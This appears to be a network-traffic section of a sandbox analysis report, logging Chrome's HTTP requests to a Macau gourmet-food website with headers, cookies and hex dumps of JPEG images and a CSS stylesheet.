                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 16 00 5f 03 01 11 00 02 11 01 03 11 01 ff c4 00 91 00 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 08 09 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 04 01 03 03 03 02 06 03 00 00 00 00 00 00 01 02 03 04 05 06 00 11 12 21 13 07 31 22 14 32 23 41 51 42 33 15 16 24 17 27 11 00 02 01 03 02 04 04 01 0b 05 00 00 00 00 00 00 01 02 11 00 12 03 21 04 31 22 13 05 41 51 91 32 61 f0 71 81 a1 b1 f1 42 52 23 33 06 c1 a2 14 24 15 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 f3 45 14 68 a2 8d 14 51 a2 8a 34 51 46 8a 28 d1 45 33 9f 63 5f 55 15 c9 d6 93 a3 d6 c1 64 a1 2e cc 94 ea 19 69 25 c5 86 d0 14 b5 90 90 54 a5 04 8e bd 49 03 51 66 cf 8f 02 17 c8 c1 54 78 92 00 d4 c0 d4 f9 9d 3e 7a 42 40 d4 d3 cd 4b 4b 46 8a 28 d1 45 1a 28 ae 76 f1 ae 17 8c 79 0b 01 ad cb b3 1a b6 32 2c 9b 2d 43 d3 67 de ca 01 c9 51 96 a7 dc e0 dc 37 4e ea 8c 96 00 09 40 68 a7 6e 3f 9e b8 7e c1 da b6 bd d3 60 bb ad d2 0c 99 72 cb 17 3a b2 ea 60 21 e2 81 38 00 b1 11 55 70 e3 5c 89 73 6a 4d 21 e3 5f 21 e4 92 aa fc 31 57 62 f3 56 87 2d 19 0c 5b 5b 79 1c 97 25 d4 52 a9 c4 46 75 0b 4a c2 79 38 10 0a ca 82 b7 f5 f5 eb a6 76 1e f9 b9 7c 5b 1c 6e 43 75 7a a1 98 ea c7 a5 21 48 33 c4 c7 34 cc d2 61 ca c4 20 3e 33 f5 53 db 7f 2a 65 71 58 cb 05 6d 75 5c 99 d4 f9 e4 0c 4e a1 87 d2 f2 10 eb 33 53 1f dc f2 c3 a7 65 f2 78 8e 40 6c 07 e8 3f 8c bb 9f e4 7b b4 5c dd 35 42 c9 b9 4c 2a 0c c1 0f 6f 13 3c 65 b8 f0 1f 94 d2 b6 66 13 11 ee 8a dc 6a 5b b8 6a 0b 48 bd 9b 0e 7d 98 2a 2f c9 81 15 c8 6c 10 4f b4 25 a7 64 49 50 d8 74 24 b8 77 f5 d8 7a 6b ae db 2e 65 c6 06 66 56 7f 12 aa 54 7a 16 73 fd de 95 65 66 35 ae 30 f1 fd 34 4b 4c 53 c6 6b c2 f1 79 50 b3 c8 f7 e6 4d e6 6a cd 63 f0 99 4d 7b 73 de 54 a1 22 c5 6d 34 d4 b4 ad 90 1b 0d 85 b9 b9 e9 b0 db a7 95 f6 5d aa 66 da 6d 4e d3 11 1b 81 92 5b 28 42 82 c0 e6 fb b2 10 17 20 2b cb 68 2d e5 02 2b 3f 12 ca ad a3 9a 78 c7 c7 cf c6 b7 08 fe 43 c9 d0 d7 92 32 5b 44 55 b1 88 f8 ea c2 ce 1a a0 b1 1d f7 2c 27 88 4c f7 53 c5 e3 20 36 c9 05 68 04 96 d7 cb af 44 74 27 ae c7 df 37 40 6e b7 19 2c 18 76 ec eb 00 12 ef 60 9f 75 d6 af 11 f8 5a 75 f6 f1 ab 03 2b 73 13 10 26 95 6b 35 cd e9 57 80 58 65 6d d2 4b a8 cf a7 c7 ac f8 75 6c 48 66 45 74 99 ac ad f8 db bc f4 87 53 25 3e c2 95 90 db 5b 1e a0 1f 4d 2a f7 6d f6 dc ed 9f 73 d3 29 9d 82 c2 06 0d 8d 9c 16 5e 66 66 0e 34 83 ca 9e 62 97 a8 c2 d2 d1 07 ea ac d7 c8 19 3e 5f 9a 78 a2 eb 27 40 a8 8d 87 cd ba 8f 16 25 61 65 f1 62 23 c4 bb 66 3b 72 15 27 bc 5a 2a 5b 8d 75 6b b2 36 49 df b9 b8 d8 e0 f7 be e1
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed_!1"2#AQB3$'!1"AQ2aqBR#3$?EhQ4QF(E3c_Ud.i%TIQfTx>zB@KKF(E(vy2,-CgQ7N@hn?~`r:`!8Up\sjM!_!1WbV-[[y%RFuJy8v|[nCuz!H34a >3S*eqXmu\N3Sex@l?{\5BL*o<efj[jH}*/lO%dIPt$wzk.efVTzsef504KLSkyPMjcM{sT"m4]fmN[(B +h-+?xC2[DU,'LS 6hDt'7@n,v`uZu+s&k5WXemKulHfEtS%>[M*ms)^ff4b>_x'@%aeb#f;r'Z*[uk6I
                                                                                                                                                              Mar 13, 2023 05:27:22.529164076 CET3478OUTGET /uploadfiles/SRL_9_1_3754306.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:22.734402895 CET3511INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 227297
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:24:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "6a91213ba8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:28 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 30 5c 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 00 01 03 00 01 00 00 00 f0 15 00 00 01 01 03 00 01 00 00 00 a0 0e 00 00 02 01 03 00 03 00 00 00 b6 00 00 00 06 01 03 00 01 00 00 00 02 00 00 00 0f 01 02 00 06 00 00 00 bc 00 00 00 10 01 02 00 15 00 00 00 c2 00 00 00 12 01 03 00 01 00 00 00 01 00 00 00 15 01 03 00 01 00 00 00 03 00 00 00 1a 01 05 00 01 00 00 00 d7 00 00 00 1b 01 05 00 01 00 00 00 df 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 31 01 02 00 1e 00 00 00 e7 00 00 00 32 01 02 00 14 00 00 00 05 01 00 00 69 87 04 00 01 00 00 00 1c 01 00 00 38 03 00 00 08 00 08 00 08 00 43 61 6e 6f 6e 00 43 61 6e 6f 6e 20 45 4f 53 20 35 44 20 4d 61 72 6b 20 49 49 00 00 9f 24 00 10 27 00 00 00 9f 24 00 10 27 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 36 3a 32 32 20 31 30 3a 31 31 3a 35 32 00 00 00 00 1e 00 9a 82 05 00 01 00 00 00 8a 02 00 00 9d 82 05 00 01 00 00 00 92 02 00 00 22 88 03 00 01 00 00 00 01 00 00 00 27 88 03 00 01 00 00 00 64 00 00 00 00 90 07 00 04 00 00 00 30 32 32 31 03 90 02 00 14 00 00 00 9a 02 00 00 04 90 02 00 14 00 00 00 ae 02 00 00 01 92 0a 00 01 00 00 00 c2 02 00 00 02 92 05 00 01 00 00 00 ca 02 00 00 04 92 0a 00 01 00 00 00 d2 02 00 00 05 92 05 00 01 00 00 00 da 02 00 00 07 92 03 00 01 00 00 00 05 00 00 00 09 92 03 00 01 00 00 00 10 00 00 00 0a 92 05 00 01 00 00 00 e2 02 00 00 90 92 02 00 03 00 00 00 33 30 00 00 91 92 02 00 03 00 00 00 33 30 00 00 92 92 02 00 03 00 00 00 33 30 00 00 01 a0 03 00 01 00 00 00 ff ff 00 00 02 a0 04 00 01 00 00 00 f4 01 00 00 03 a0 04 00 01 00 00 00 4e 01 00 00 0e a2 05 00 01 00 00 00 ea 02 00 00 0f a2 05 00 01 00 00 00 f2 02 00 00 10 a2 03 00 01 00 00 00 02 00 00 00 01 a4 03 00 01 00 00 00 00 00 00 00 02 a4 03 00 01 00 00 00 01 00 00 00 03 a4 03 00 01 00 00 00 01 00 00 00 06 a4 03 00 01 00 00 00 00 00 00 00 31 a4 02 00 0a 00 00 00 fa 02 00 00 32 a4 05 00 04 00 00 00 04 03 00 00 34 a4 02 00 14 00 00 00 24 03 00 00 00 00 00 00 01 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 32 30 31 33 3a 31 31 3a 30 38 20 31 33 3a 30 36 3a 33 34 00 00 00 00 00 01 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 80 b1 55 00 b3 05 00 00 00 21 39 00 be 03 00 00 39 33 30 36 31 31 30 36 37 00 64 00 00 00 01 00 00 00 64 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 45 46 31 30 30 6d 6d 20 66 2f 32 2e 38 20 4d 61 63 72 6f 00 06 00 03 01 03 00 01 00 00 00 06 00 00 00 1a 01 05 00 01 00 00 00 86 03 00 00 1b 01 05 00 01 00 00 00 8e 03 00 00 28 01 03 00 01 00 00 00 02 00 00 00 01 02 04 00 01 00 00 00 96 03 00 00 02 02 04 00 01 00 00 00 be 2c 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48
                                                                                                                                                              Data Ascii: 0\ExifII*(12i8CanonCanon EOS 5D Mark II$'$'Adobe Photoshop CS6 (Windows)2020:06:22 10:11:52"'d0221303030N124$2013:11:08 13:06:342013:11:08 13:06:34dU!9930611067ddEF100mm f/2.8 Macro(,HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-H
                                                                                                                                                              Mar 13, 2023 05:27:30.690179110 CET4560OUTGET /SysImages/Next.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/OurProducts.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:30.896687984 CET4584INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 506
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:36 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e6543c1da8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:36 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 7d 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 09 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 10 00 00 03 05 05 05 09 00 00 00 00 00 00 00 00 00 02 03 04 01 11 12 13 05 00 33 14 15 06 31 51 64 36 07 21 22 32 62 53 a3 d3 24 54 11 00 00 03 04 09 05 00 00 00 00 00 00 00 00 00 00 00 01 11 21 31 12 03 f0 51 61 c1 d1 02 13 33 04 71 81 22 52 a2 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 a8 d4 8d 50 a0 5d 5c a6 74 cd bd 3b 26 ad a7 4f d0 74 ed 48 b3 5a 10 41 4e a7 ad 3d 4a c4 f2 97 08 d6 b0 23 0a 90 a7 64 a6 16 f3 18 30 8d ad 00 cb 8c 64 f2 93 f9 d3 8b 97 9a 51 2c 28 aa ae 69 95 cc c1 cb d4 3d 58 11 88 ab 53 e9 46 26 c0 21 fc 64 73 6e 16 ec 37 1e 96 cf 07 97 65 b6 35 33 56 7b 6b de be a1 a1 2d 27 35 ca e9 b2 f3 a9 78 52 a0 95 95 cb 74 0c 74 13 3b ee dd 17 6e fb 4b 3a 08 f3 2c 2f 3f 7b 81 04 3e df 1d cc dc 25 f7 cb ed 5a df 1b 36 ed 76 1f 40 0f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed}31Qd6!"2bS$T!1Qa3q"R?P]\t;&OtHZAN=J#d0dQ,(i=XSF&!dsn7e53V{k-'5xRtt;nK:,/?{>%Z6v@
                                                                                                                                                              Mar 13, 2023 05:27:31.703325033 CET4808OUTGET /SysImages/Prev.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:27:31.907774925 CET4901INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 513
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:23:37 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "d2b55d1da8b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:27:37 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 0b 00 0a 03 01 11 00 02 11 01 03 11 01 ff c4 00 81 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 09 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 03 04 05 06 10 00 00 02 07 05 06 07 00 00 00 00 00 00 00 00 00 01 03 11 02 12 13 04 05 06 00 33 14 15 07 21 31 51 22 64 36 32 62 53 a3 d3 24 54 11 00 01 01 04 05 0d 01 00 00 00 00 00 00 00 00 00 01 11 00 02 12 03 f0 31 51 61 71 21 41 81 b1 c1 d1 f1 22 52 a2 13 33 04 05 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 a8 da 81 54 44 50 d2 ad 28 19 46 9d 93 51 a9 5a d4 d4 fc 82 7f 51 ae 41 4b c2 4a 61 a6 51 50 e4 19 11 12 0a 88 1c 2b 9c f0 4b 25 64 3b 03 04 04 c5 d2 c1 47 72 9f a1 f7 4e 93 31 1d 52 0b e9 5e 40 09 4e 19 b5 15 ce 98 5c 85 02 a9 03 0a 52 f4 d8 08 1f c6 47 76 e1 6e d5 b8 f4 b7 78 3c bb ad b1 e4 7a d3 eb 5d 36 e2 cd 64 b2 9c d7 2b 96 bb ce 9d e1 4a 61 d6 56 ed 0c 02 18 79 ce 8e 0d 6d e3 69 67 41 1b cb 0d 67 af 63 16 21 f6 fa ee e6 e9 2f be 5f 6a d6 f2 dd eb be ad dd cc 1b ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed3!1Q"d62bS$T1Qaq!A"R3?TDP(FQZQAKJaQP+K%d;GrN1R^@N\RGvnx<z]6d+JaVymigAgc!/_j


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              24192.168.2.34970859.188.3.13280C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              Mar 13, 2023 05:26:05.826623917 CET614OUTGET /m/static/css/index_mobile.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:06.054049015 CET642INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 7367
                                                                                                                                                              Content-Type: text/css
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:15 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "6ca245a5a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:11 GMT
                                                                                                                                                              Data Raw: 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 38 39 39 70 78 29 7b 0d 0a 20 20 0d 0a 20 20 2e 73 77 69 70 65 72 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 35 2e 38 72 65 6d 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 36 30 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 69 70 65 72 2d 69 63 6f 6e 7b 0d 0a 20 20 20 20 74 6f 70 3a 32 2e 35 72 65 6d 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 61 61 61 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 31 72 65 6d 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 31 72 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 2e 36 72 65 6d 3b 0d 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 72 65 6d 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 72 67 62 61 28 32 32 2c 32 32 2c 32 32 2c 30 2e 31 29 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 69 70 65 72 2d 6c 65 66 74 7b 0d 0a 20 20 20 20 6c 65 66 74 3a 35 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 2d 32 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 69 70 65 72 2d 72 69 67 68 74 7b 0d 0a 20 20 20 20 72 69 67 68 74 3a 35 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 69 6e 64 65 6e 74 3a 32 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 0d 0a 20 20 2e 73 77 61 70 65 72 2d 69 6e 64 65 78 7b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 61 70 65 72 2d 69 6e 64 65 78 20 2e 69 6e 64 65 78 73 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 32 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 34 70 78 3b 0d 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 30 20 32 70 78 3b 0d 0a 20 20 7d 0d 0a 0d 0a 20 20 2e 73 77 61 70 65 72 2d 69 6e 64 65 78 20 2e 69 6e 64 65 78 73 20 2e 6d 79 75 73 65 7b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 34 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 2e 73 77 61 70 65 72 2d 69 6e 64 65 78 20 2e 69 6e 64 65 78 73 20 2e 75 73 65 64 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 32 30 70 78 3b 0d 0a 20 20 7d 0d 0a 20 20 0d 0a 20 20 2e 75 70 65 72 2d 69 6d 67 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 0d 0a 20 20 7d 0d 0a 0d 0a 20 20 2e 62 6f 74 74 6f 6d 2d 69 6d 67 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 0d 0a 20 20 7d 0d 0a 20 20 0d 0a 0d 0a 20 20 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6e 65 77 20 70 72 6f 64 75 63 74 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 2d 62 6f 78 20 7b 0d 0a 20 09 70 61 64 64 69 6e 67 3a 20 33 30 70 78 20 30 3b 0d 0a 20 7d 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 2d 62 6f 78 20 68 32 20 7b 0d 0a 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 0d 0a 20 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 30 70 78 3b 0d 0a 20 7d 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 7b 0d 0a 20 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0d 0a 20 7d 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 2e 70 72
                                                                                                                                                              Data Ascii: @media screen and (max-width: 899px){ .swiper{ width:100%; height:5.8rem; margin-top:60px; } .swiper-icon{ top:2.5rem; color:#aaa; width:1rem; height:1rem; font-size:.6rem; line-height:1rem; border-radius:50%; background:rgba(22,22,22,0.1); } .swiper-left{ left:5px; text-indent:-2px; } .swiper-right{ right:5px; text-indent:2px; } .swaper-index{ bottom:15px; } .swaper-index .indexs{ width:20px; height:4px; overflow:hidden; margin:0 2px; } .swaper-index .indexs .myuse{ height:4px; } .swaper-index .indexs .used{ width:20px; } .uper-img{ display:none; } .bottom-img{ display:none; } /*----------------new product---------------*/ .new-products-box { padding: 30px 0; } .new-products-box h2 { font-size: 20px; line-height: 20px; } .new-products { display: block; margin-top: 20px; } .new-products .pr
                                                                                                                                                              Mar 13, 2023 05:26:06.054140091 CET643INData Raw: 6f 64 75 63 74 2d 6c 65 66 74 2c 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 2e 70 72 6f 64 75 63 74 2d 6d 69 64 64 6c 65 2c 0d 0a 20 2e 6e 65 77 2d 70 72 6f 64 75 63 74 73 20 2e 70 72 6f 64 75 63 74 2d 72 69 67 68 74 20 7b 0d 0a 20 09 77
                                                                                                                                                              Data Ascii: oduct-left, .new-products .product-middle, .new-products .product-right { width: 100%; display: block; } .new-products h3 { font-size: 18px; line-height: 18px; margin-bottom: 10px; } .new-products p { font-size: 1
                                                                                                                                                              Mar 13, 2023 05:26:06.257090092 CET659INData Raw: 2c 34 37 2c 30 2e 30 38 29 3b 0d 0a 20 20 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 33 70 78 20 30 70 78 20 72 67 62 61 28 32 38 2c 34 31 2c 34 37 2c 30 2e 30 38 29 3b 0d 0a 20 20 09 2d 6d 6f 7a 2d 62
                                                                                                                                                              Data Ascii: ,47,0.08); -webkit-box-shadow: 0px 1px 3px 0px rgba(28,41,47,0.08); -moz-box-shadow: 0px 1px 3px 0px rgba(28,41,47,0.08); -ms-box-shadow: 0px 1px 3px 0px rgba(28,41,47,0.08);}/*--------------- --------------*
                                                                                                                                                              Mar 13, 2023 05:26:06.257157087 CET661INData Raw: 75 72 6c 28 2e 2e 2f 69 6d 67 2f 73 69 62 63 2e 6a 70 67 29 3b 0d 0a 7d 0d 0a 2e 73 6f 6c 75 74 69 6f 6e 73 2d 6c 69 73 74 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 20 2e 6c 69 73 74 2d 6e 6f 2d 68 6f 76 65 72 7b 0d 0a 09 62 61 63 6b 67 72
                                                                                                                                                              Data Ascii: url(../img/sibc.jpg);}.solutions-list li:nth-child(2) .list-no-hover{background-image: url(../img/sibd.jpg);}.solutions-list li:nth-child(3) .list-no-hover{background-image: url(../img/sibb.jpg);}.solutions-list li:nth-child(
                                                                                                                                                              Mar 13, 2023 05:26:06.257206917 CET662INData Raw: 68 6f 76 65 72 2d 65 6e 20 68 33 20 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0d 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74
